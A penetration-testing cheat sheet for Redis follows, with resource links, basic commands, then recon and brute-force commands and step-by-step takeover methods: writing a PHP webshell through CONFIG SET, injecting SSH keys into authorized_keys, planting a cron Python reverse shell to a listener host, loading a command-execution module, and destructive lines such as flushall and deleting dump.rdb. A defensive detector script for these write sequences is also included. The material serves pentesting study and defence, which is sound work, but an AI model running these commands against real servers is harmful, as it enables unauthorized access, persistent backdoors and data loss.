Resources
- Core Concepts
- By geeksforgeeks : https://www.geeksforgeeks.org/system-design/introduction-to-redis-server/
- By hostman : https://hostman.com/tutorials/redis-getting-started-and-basic-commands/
- By dragonflydb : https://www.dragonflydb.io/guides/redis-best-practices
- By severalnines : https://severalnines.com/blog/redis-how-installation-setup-and-configuration/
- By digitalocean : https://www.digitalocean.com/community/tutorials/how-to-install-and-secure-redis-on-ubuntu-18-04
- Exploitation :
- By verylazytech : https://medium.verylazytech.com/hands-on-guide-to-exploiting-redis-mongodb-and-misconfigured-databases-master-real-world-attacks-c990a0cfdbd6
- By pentester academy : https://blog.pentesteracademy.com/redis-arbitrary-file-upload-7c3fce56d04f
- CVE-2022-24834 : https://ethicalhacking.uk/redis-exploit-a-technical-deep-dive-into-cve-2022-24834/#gsc.tab=0
- By Victor : https://medium.com/@Victor.Z.Zhu/redis-unauthorized-access-vulnerability-simulation-victor-zhu-ac7a71b2e419
- By reverse-tcp : https://web.archive.org/web/20191201022931/http://reverse-tcp.xyz/pentest/database/2017/02/09/Redis-Hacking-Tips.html
- By zeronights : https://web.archive.org/web/20240327213708/https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf
- CVE-2025-49844 (redishell): https://www.wiz.io/blog/wiz-research-redis-rce-cve-2025-49844 | https://www.sysdig.com/blog/cve-2025-49844-redishell | https://redrays.io/blog/poc-for-cve-2025-49844-cve-2025-46817-and-cve-2025-46818-critical-lua-engine-vulnerabilities/ | https://www.offsec.com/blog/recent-vulnerabilities-in-redis-servers-lua-scripting-engine/
- Examples :
- Machines :
Cheat sheet
- By secybr : https://secybr.com/posts/redis-pentesting-best-practices/
- By kh4sh3i : https://github.com/kh4sh3i/Redis-Pentesting
- By routezero : https://routezero.security/2025/05/01/redis-cheat-sheet-for-penetration-testers/
- By d4rkc0de : https://publish.obsidian.md/d4rkc0de/oscp-tips/004-port-server-pentest/server-redis-port-6379
- By snovvcra : https://ppn.snovvcra.sh/pentest/infrastructure/dbms/redis
- Redis commands : https://gist.github.com/LeCoupa/1596b8f359ad8812c7271b5322c30946
Commands
- Core
- Data Types
- String
```
SET name "educative"
get name
```
- List
```
LPUSH mylist x
LPUSH mylist y
RPUSH mylist z
LRANGE mylist 0 -1
```
- Sets
```
SADD myset "a" "b" "c" "a"
SMEMBERS myset
```
- Hash (used to represent objects, but can store many elements and are useful for other tasks as well)
```
HMSET user:1000 username antirez password P1pp0 age 34
HGETALL user:1000
HSET user:1000 password 12345
HGETALL user:1000
```
In fact, a hash can store up to (2^32)-1 field-value pairs, which equates to more than 4 billion.
- Recon
- Enum
```
# Shodan
port:6379 product:Redis
# Censys
services.service_name: REDIS
# nmap
nmap -p 6379,27017 --open -Pn 10.0.0.0/8
nmap --script redis-info -sV -p 6379 192.168.99.21
# Banner grabbing
nc -vn 192.168.99.21 6379
# MSF
msf > use auxiliary/scanner/redis/redis_server
```
- Brute force
```
nmap --script redis-brute -p 6379 192.168.99.21
msf > use auxiliary/scanner/redis/redis_login
hydra -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.168.99.21 redis # Faster
```
- Exploit
- Connect
```
redis-cli -h 10.129.134.253 # NO AUTH
# Test with
redis-cli -h 10.129.134.253 -p 6379
redis-cli -h 192.168.99.21 -a redis12345 # With password
```
- Post Exploitation
- Redis commands
```
INFO # Server info
PING # I'm ok !
AUTH default redis12345 # Good username & password
CLIENT LIST # Connected clients
CONFIG GET * # Get configs
INFO Keyspace # How many databases
SELECT 0 # Select database number (from INFO Keyspace)
KEYS * # Dump keys
flushall # Flush all databases
```
- Database Dump
```
npm install redis-dump -g
redis-dump -h 192.168.99.22 -a pass123 -f 'mydb:*' > mydb.dump.txt
```
- Shell
- Webshell
```
# You must know the physical path of the web site
config set dir /var/www/html/ # Write permission
config set dbfilename redis.php
set test "<?php system($_GET['cmd']); ?>"
save
```
Then
```
curl http://192.168.99.21/redis.php?cmd=ifconfig --output -
```
Tips & Tricks: finding the web dir
```
/var/www/html
/home/redis/.ssh
/var/lib/redis/.ssh
/var/spool/cron/crontabs
/var/spool/cron
```
```
$ for dname in $(cat dirs.txt); do redis-cli -h 192.168.99.21 config set dir "$dname"; done
```
- SSH
```
ssh-keygen -t rsa
(echo -e "\n\n"; cat ./id_rsa; echo -e "\n\n") > foo.txt
cat foo.txt | redis-cli -h 192.168.99.21 -a redis12345 -x set crackit
redis-cli -h 192.168.99.21 -a redis12345
192.168.99.21:6379> config set dir home/app/.ssh # From the Config
192.168.99.21:6379> config set dbfilename "authorized_keys"
192.168.99.21:6379> save
chmod 600 id_rsa
ssh -i id_rsa app@192.168.99.21
```
- Crontabs (Root needed to run the server)
```
echo -e "\n\n\n*/1 * * * * /usr/bin/python3 -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.99.22\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/bash\")'\n\n\n" | redis-cli -h 192.168.99.21 -a redis12345 -x set crackme
redis-cli -h 192.168.99.21 -a redis12345 config set dir /var/spool/cron/crontabs
redis-cli -h 192.168.99.21 -a redis12345 config set dbfilename root
redis-cli -h 192.168.99.21 -a redis12345 save
rlwrap nc -nlvp 8888
```
- Load Redis Module
https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
```
127.0.0.1:6379> system.exec "id"
"uid=0(root) gid=0(root) groups=0(root)\n"
127.0.0.1:6379> system.exec "whoami"
"root\n"
127.0.0.1:6379> system.rev 127.0.0.1 9999
```
Unload the module whenever you want:
```
MODULE UNLOAD mymodule
```
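Detection side of the Shell entries above, as an added example that is not part of the original page or of any linked tool: the Webshell, SSH and Crontabs techniques all share the sequence CONFIG SET dir, CONFIG SET dbfilename, SAVE, so this check flags that sequence (and MODULE LOAD) in lines shaped like Redis MONITOR output. The function names, the sensitive-directory list and the sample lines are assumptions made for this illustration.

```python
import re
import shlex

# Write targets named on this page: web root, .ssh directories, cron spool.
SENSITIVE_DIRS = ("/var/www", "/.ssh", "/var/spool/cron")
LINE_RE = re.compile(r'^(\d+\.\d+) \[(\d+) (\S+)\] (.*)$')  # <ts> [<db> <client>] "arg" ...

def parse_monitor_line(line):
    # Returns (client_ip, [args]) for one MONITOR line, or None if unparsable.
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    try:
        args = shlex.split(m.group(4))
    except ValueError:  # unbalanced quotes in a truncated line
        return None
    return m.group(3).rsplit(":", 1)[0], args

def detect_file_write_abuse(lines):
    """Flag CONFIG SET dir + dbfilename followed by SAVE, and MODULE LOAD."""
    state, alerts = {}, []
    for line in lines:
        parsed = parse_monitor_line(line)
        if not parsed or not parsed[1]:
            continue
        ip, args = parsed
        cmd = [a.lower() for a in args[:3]]
        # Keyed by IP, not ip:port: each redis-cli invocation uses a new port.
        s = state.setdefault(ip, {"dir": None, "file": None})
        if cmd[:2] == ["config", "set"] and len(args) >= 4:
            if cmd[2] == "dir" and any(d in args[3] for d in SENSITIVE_DIRS):
                s["dir"] = args[3]
            elif cmd[2] == "dbfilename" and not args[3].endswith(".rdb"):
                s["file"] = args[3]
        elif cmd[0] in ("save", "bgsave") and s["dir"] and s["file"]:
            alerts.append((ip, "file-write", s["dir"].rstrip("/") + "/" + s["file"]))
            s["dir"] = s["file"] = None
        elif cmd[:2] == ["module", "load"] and len(args) >= 3:
            alerts.append((ip, "module-load", args[2]))
    return alerts

# Constructed MONITOR output (not captured from a real server).
SAMPLE = r'''
1700000001.100000 [0 10.0.0.5:40100] "get" "session:42"
1700000002.100000 [0 192.168.99.22:50112] "config" "set" "dir" "/var/spool/cron/crontabs"
1700000002.200000 [0 192.168.99.22:50114] "CONFIG" "SET" "dbfilename" "root"
1700000002.300000 [0 10.0.0.5:40100] "config" "set" "dbfilename" "dump.rdb"
1700000002.400000 [0 192.168.99.22:50116] "save"
'''.strip().splitlines()
print(detect_file_write_abuse(SAMPLE))
```

MONITOR adds load on a busy server; the same logic applies to any command log that records the client address and arguments.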
Tools
- Redis-server-exploit : https://github.com/iw00tr00t/Redis-Server-Exploit/tree/master
- redis-dump : https://www.npmjs.com/package/redis-dump
- RedisModules-ExecuteCommand : https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
- Gopherus : https://github.com/tarunkant/Gopherus
- Rogue_Server : https://github.com/n0b0dyCN/redis-rogue-server
- redis : https://github.com/antirez/redis
Machines
Notes
Service down? Try: rm -f /var/lib/redis/dump.rdb